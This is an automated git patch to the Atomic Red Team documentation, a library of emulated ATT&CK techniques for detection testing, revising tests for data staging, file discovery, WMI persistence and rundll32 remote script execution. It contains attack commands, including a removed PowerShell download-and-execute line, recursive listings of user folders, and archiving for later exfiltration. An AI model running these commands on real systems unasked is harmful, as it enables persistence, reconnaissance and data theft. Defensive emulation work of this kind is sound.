From 3bc48cf815cd8f96432e551997079001e5ee8a0e Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team doc generator
Date: Fri, 3 Apr 2020 15:04:00 +0000
Subject: [PATCH] Generate docs from job=validate_atomics_generate_docs branch=master
---
 atomics/T1074/T1074.md | 27 +++++++++++++---
 atomics/T1083/T1083.md | 6 ++--
 atomics/T1084/T1084.md | 10 +++---
 atomics/T1085/T1085.md | 2 +-
 atomics/index.md | 2 +-
 atomics/index.yaml | 66 ++++++++++++++++++++++++----------------
 atomics/windows-index.md | 2 +-
 7 files changed, 72 insertions(+), 43 deletions(-)
diff --git a/atomics/T1074/T1074.md b/atomics/T1074/T1074.md
index f1d4dfa3..013cd8d4 100644
--- a/atomics/T1074/T1074.md
+++ b/atomics/T1074/T1074.md
@@ -16,21 +16,31 @@ Interactive command shells may be used, and common functionality within [cmd](ht
## Atomic Test #1 - Stage data from Discovery.bat -Utilize powershell to download discovery.bat and save to a local file +Utilize powershell to download discovery.bat and save to a local file. This emulates an attacker downloading data collection tools onto the host. Upon execution, +verify that the file is saved in the temp directory. **Supported Platforms:** Windows +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| output_file | Location to save downloaded discovery.bat file | Path | $env:TEMP\discovery.bat| + #### Attack Commands: Run with `powershell`! ```powershell -IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/src/Discovery.bat') > pi.log +Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/src/Discovery.bat" -OutFile #{output_file} ``` +#### Cleanup Commands: +```powershell +Remove-Item -Force #{output_file} -ErrorAction Ignore +``` @@ -64,24 +74,31 @@ curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ato
## Atomic Test #3 - Zip a Folder with PowerShell for Staging in Temp -Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration. +Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration. Upon execution, Verify that a zipped folder named Folder_to_zip.zip +was placed in the temp directory. **Supported Platforms:** Windows +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| input_file | Location of file or folder to zip | Path | PathToAtomicsFolder\T1074\bin\Folder_to_zip| +| output_file | Location to save zipped file or folder | Path | $env:TEMP\Folder_to_zip.zip| + #### Attack Commands: Run with `powershell`! ```powershell -Compress-Archive -Path $PathToAtomicsFolder\T1074\bin\Folder_to_zip -DestinationPath $env:TEMP\Folder_to_zip.zip +Compress-Archive -Path #{input_file} -DestinationPath #{output_file} -Force ``` #### Cleanup Commands: ```powershell -Remove-Item -Path $env:TEMP\Folder_to_zip.zip -ErrorAction Ignore +Remove-Item -Path #{output_file} -ErrorAction Ignore ``` diff --git a/atomics/T1083/T1083.md b/atomics/T1083/T1083.md index 8a89d446..a7cd04eb 100644 --- a/atomics/T1083/T1083.md +++ b/atomics/T1083/T1083.md @@ -24,7 +24,8 @@ In Mac and Linux, this kind of discovery is accomplished with the ls ## Atomic Test #1 - File and Directory Discovery (cmd.exe) -Find or discover files on the file system +Find or discover files on the file system. Upon execution, the file "download" will be placed in the temporary folder and contain the output of +all of the data discovery commands. **Supported Platforms:** Windows 
@@ -39,7 +40,6 @@ Find or discover files on the file system dir /s c:\ >> %temp%\download dir /s "c:\Documents and Settings" >> %temp%\download dir /s "c:\Program Files\" >> %temp%\download -dir /s d:\ >> %temp%\download dir "%systemdrive%\Users\*.*" >> %temp%\download dir "%userprofile%\AppData\Roaming\Microsoft\Windows\Recent\*.*" >> %temp%\download dir "%userprofile%\Desktop\*.*" >> %temp%\download @@ -55,7 +55,7 @@ tree /F >> %temp%\download
## Atomic Test #2 - File and Directory Discovery (PowerShell) -Find or discover files on the file system +Find or discover files on the file system. Upon execution, file and folder information will be displayed. **Supported Platforms:** Windows diff --git a/atomics/T1084/T1084.md b/atomics/T1084/T1084.md index 6f555bf1..9d6fd383 100644 --- a/atomics/T1084/T1084.md +++ b/atomics/T1084/T1084.md @@ -4,15 +4,14 @@ ## Atomic Tests -- [Atomic Test #1 - Persistence](#atomic-test-1---persistence) +- [Atomic Test #1 - Persistence via WMI Event Subscription](#atomic-test-1---persistence-via-wmi-event-subscription)
-## Atomic Test #1 - Persistence -Run from an administrator powershell window - -After running, reboot the victim machine. After it has been online for 4 minutes you should see notepad.exe running as SYSTEM. +## Atomic Test #1 - Persistence via WMI Event Subscription +Run from an administrator powershell window. After running, reboot the victim machine. +After it has been online for 4 minutes you should see notepad.exe running as SYSTEM. Code references @@ -52,7 +51,6 @@ $FilterToConsumerBinding = New-CimInstance -Namespace root/subscription -ClassNa $EventConsumerToCleanup = Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'" $EventFilterToCleanup = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'" $FilterConsumerBindingToCleanup = Get-WmiObject -Namespace root/subscription -Query "REFERENCES OF {$($EventConsumerToCleanup.__RELPATH)} WHERE ResultClass = __FilterToConsumerBinding" -ErrorAction SilentlyContinue - $FilterConsumerBindingToCleanup | Remove-WmiObject $EventConsumerToCleanup | Remove-WmiObject $EventFilterToCleanup | Remove-WmiObject diff --git a/atomics/T1085/T1085.md b/atomics/T1085/T1085.md index 3c495239..58bb0399 100644 --- a/atomics/T1085/T1085.md +++ b/atomics/T1085/T1085.md @@ -24,7 +24,7 @@ Rundll32 can also been used to execute scripts such as JavaScript. This can be d
## Atomic Test #1 - Rundll32 execute JavaScript Remote Payload With GetObject -Test execution of a remote script using rundll32.exe +Test execution of a remote script using rundll32.exe. Upon execution notepad.exe will be opened. **Supported Platforms:** Windows diff --git a/atomics/index.md b/atomics/index.md index 18884c53..a2e4aab4 100644 --- a/atomics/index.md +++ b/atomics/index.md @@ -141,7 +141,7 @@ - [T1100 Web Shell](./T1100/T1100.md) - Atomic Test #1: Web Shell Written to Disk [windows] - [T1084 Windows Management Instrumentation Event Subscription](./T1084/T1084.md) - - Atomic Test #1: Persistence [windows] + - Atomic Test #1: Persistence via WMI Event Subscription [windows] - [T1004 Winlogon Helper DLL](./T1004/T1004.md) - Atomic Test #1: Winlogon Shell Key Persistence - PowerShell [windows] - Atomic Test #2: Winlogon Userinit Key Persistence - PowerShell [windows] diff --git a/atomics/index.yaml b/atomics/index.yaml index 56294edc..87171f76 100644 --- a/atomics/index.yaml +++ b/atomics/index.yaml @@ -5075,11 +5075,10 @@ persistence: modified: '2019-10-15T18:43:47.703Z' identifier: T1084 atomic_tests: - - name: Persistence + - name: Persistence via WMI Event Subscription description: | - Run from an administrator powershell window - - After running, reboot the victim machine. After it has been online for 4 minutes you should see notepad.exe running as SYSTEM. + Run from an administrator powershell window. After running, reboot the victim machine. + After it has been online for 4 minutes you should see notepad.exe running as SYSTEM. Code references 
@@ -5111,7 +5110,6 @@ persistence: $EventConsumerToCleanup = Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'" $EventFilterToCleanup = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'" $FilterConsumerBindingToCleanup = Get-WmiObject -Namespace root/subscription -Query "REFERENCES OF {$($EventConsumerToCleanup.__RELPATH)} WHERE ResultClass = __FilterToConsumerBinding" -ErrorAction SilentlyContinue - $FilterConsumerBindingToCleanup | Remove-WmiObject $EventConsumerToCleanup | Remove-WmiObject $EventFilterToCleanup | Remove-WmiObject @@ -11663,7 +11661,8 @@ defense-evasion: identifier: T1085 atomic_tests: - name: Rundll32 execute JavaScript Remote Payload With GetObject - description: 'Test execution of a remote script using rundll32.exe + description: 'Test execution of a remote script using rundll32.exe. Upon execution + notepad.exe will be opened. ' supported_platforms: @@ -17338,9 +17337,9 @@ discovery: identifier: T1083 atomic_tests: - name: File and Directory Discovery (cmd.exe) - description: 'Find or discover files on the file system - -' + description: | + Find or discover files on the file system. Upon execution, the file "download" will be placed in the temporary folder and contain the output of + all of the data discovery commands. supported_platforms: - windows executor: 
@@ -17350,13 +17349,13 @@ discovery: dir /s c:\ >> %temp%\download dir /s "c:\Documents and Settings" >> %temp%\download dir /s "c:\Program Files\" >> %temp%\download - dir /s d:\ >> %temp%\download dir "%systemdrive%\Users\*.*" >> %temp%\download dir "%userprofile%\AppData\Roaming\Microsoft\Windows\Recent\*.*" >> %temp%\download dir "%userprofile%\Desktop\*.*" >> %temp%\download tree /F >> %temp%\download - name: File and Directory Discovery (PowerShell) - description: 'Find or discover files on the file system + description: 'Find or discover files on the file system. Upon execution, file + and folder information will be displayed. ' supported_platforms: @@ -23689,7 +23688,8 @@ execution: identifier: T1085 atomic_tests: - name: Rundll32 execute JavaScript Remote Payload With GetObject - description: 'Test execution of a remote script using rundll32.exe + description: 'Test execution of a remote script using rundll32.exe. Upon execution + notepad.exe will be opened. ' supported_platforms: 
@@ -27306,17 +27306,24 @@ collection: identifier: T1074 atomic_tests: - name: Stage data from Discovery.bat - description: 'Utilize powershell to download discovery.bat and save to a local - file - -' + description: | + Utilize powershell to download discovery.bat and save to a local file. This emulates an attacker downloading data collection tools onto the host. Upon execution, + verify that the file is saved in the temp directory. supported_platforms: - windows + input_arguments: + output_file: + description: Location to save downloaded discovery.bat file + type: Path + default: "$env:TEMP\\discovery.bat" executor: name: powershell elevation_required: false - command: 'IEX (New-Object Net.WebClient).DownloadString(''https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/src/Discovery.bat'') - > pi.log + command: 'Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/src/Discovery.bat" + -OutFile #{output_file} + +' + cleanup_command: 'Remove-Item -Force #{output_file} -ErrorAction Ignore ' - name: Stage data from Discovery.sh 
@@ -27334,21 +27341,28 @@ collection: ' - name: Zip a Folder with PowerShell for Staging in Temp - description: 'Use living off the land tools to zip a file and stage it in the - Windows temporary folder for later exfiltration. - -' + description: | + Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration. Upon execution, Verify that a zipped folder named Folder_to_zip.zip + was placed in the temp directory. supported_platforms: - windows + input_arguments: + input_file: + description: Location of file or folder to zip + type: Path + default: PathToAtomicsFolder\T1074\bin\Folder_to_zip + output_file: + description: Location to save zipped file or folder + type: Path + default: "$env:TEMP\\Folder_to_zip.zip" executor: name: powershell elevation_required: false - command: 'Compress-Archive -Path $PathToAtomicsFolder\T1074\bin\Folder_to_zip - -DestinationPath $env:TEMP\Folder_to_zip.zip + command: 'Compress-Archive -Path #{input_file} -DestinationPath #{output_file} + -Force ' - cleanup_command: 'Remove-Item -Path $env:TEMP\Folder_to_zip.zip -ErrorAction - Ignore + cleanup_command: 'Remove-Item -Path #{output_file} -ErrorAction Ignore ' '': diff --git a/atomics/windows-index.md b/atomics/windows-index.md index 3332ebf0..2c31411d 100644 --- a/atomics/windows-index.md +++ b/atomics/windows-index.md @@ -339,7 +339,7 @@ - [T1100 Web Shell](./T1100/T1100.md) - Atomic Test #1: Web Shell Written to Disk [windows] - [T1084 Windows Management Instrumentation Event Subscription](./T1084/T1084.md) - - Atomic Test #1: Persistence [windows] + - Atomic Test #1: Persistence via WMI Event Subscription [windows] - [T1004 Winlogon Helper DLL](./T1004/T1004.md) - Atomic Test #1: Winlogon Shell Key Persistence - PowerShell [windows] - Atomic Test #2: Winlogon Userinit Key Persistence - PowerShell [windows]